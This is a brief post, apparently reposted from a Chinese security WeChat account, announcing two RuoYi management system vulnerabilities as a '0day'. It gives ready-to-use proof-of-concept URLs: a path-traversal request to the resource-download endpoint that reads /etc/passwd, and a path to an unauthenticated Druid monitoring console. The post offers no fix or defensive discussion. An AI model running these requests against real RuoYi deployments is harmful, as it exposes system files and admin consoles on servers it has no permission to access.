RuoYi CMS 0day: Arbitrary File Read or Unauthorized Access
黑白之道
RuoYi management system: arbitrary file read in the admin backend
POC:
https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd
RuoYi management system: unauthorized access
POC:
http://xxx.xxx.xxx.xxx/prod-api/druid/index.html
Article source: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650509067&idx=3&sn=d23dcd4afb035f4eabe99921ead65e18&chksm=83baeaefb4cd63f9a4cfc967dc10d288f27226a2e860603345117ebd43fe818ccc876612b1a3#rd